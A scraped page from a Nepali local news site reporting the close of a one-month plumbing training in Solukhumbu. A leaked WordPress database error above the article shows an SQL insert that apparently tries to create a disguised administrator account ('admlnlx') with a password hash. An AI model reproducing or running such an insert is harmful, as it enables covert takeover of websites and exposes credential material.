WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BQisYIySOUkgYSD8Hs/gk9iJS3RRO01', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 11:01:47', '', 'admlnlx', 'admlnlx')

काकु समाबेसी द्वारा आयोजित एक महिने प्लम्बिङ तालिम समापन – Gaule Khabar

काकु समाबेसी द्वारा आयोजित एक महिने प्लम्बिङ तालिम समापन

काकु समाबेसी द्वारा आयोजित एक महिने प्लम्बिङ तालिम समापन

गाउँले न्युज, २४  असार, सोलुखुम्बु । माप्य दुधकोशी गाउँपालिकाको आर्थिक सहयोगमा काँकु समावेशी विकास समिति काठमाडौंले व्यवसायिक तथा सीप विकास तालिम केन्द्र इटहरीको प्राविधिक सहयोगमा १ महिने आधारभूत प्लम्बिङ तालिम समापन भएको छ ।

हिजो सोमबार समापन समारोहलाई सम्बोधन गर्दै कार्यक्रमका प्रमुख अतिथी तथा माप्य दुधकोशी गाउँपालिका अध्यक्ष बुद्धि किरण राईले स्थानीय सरकारले युवा स्वरोजगार बढाउन यस्ता सीप मुलक तालिम सञ्चालन गर्न आश्यक रहेको बताए साथै यस तालिमबाट उत्कृष्ट २ जनालाई गाउँपालिकाले पुरस्क्रित गर्ने बताए ।

माप्य दुधकोशी गाउँपालिका ५ मा एकमहिना सन्चालन भएको उक्त प्लम्बिङ तालिममा जम्मा २७ जनाले सहभागिता जनाएको काकु समाबेशिका महासचिब तिलक खालिङले बताए । तालिममा सभागी सम्पूर्णलाई कार्यक्रमका प्रमुख अतिथी तथा माप्य दुधकोशी गाउँपालिका अध्यक्ष बुद्दी किरण राईले प्रमाण पत्र प्रदान गर्नुभएको हो ।

काँकु समावेशी विकास समिति काठमाडौंका अध्यक्ष चन्द्र बहादुर राईको अध्यक्षतामा समपन्न कार्यक्रममा संस्थाका महासचिव तिलक राईले सञ्चालन गरेका थिए ।

https://gaulenews.com/?p=46776

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका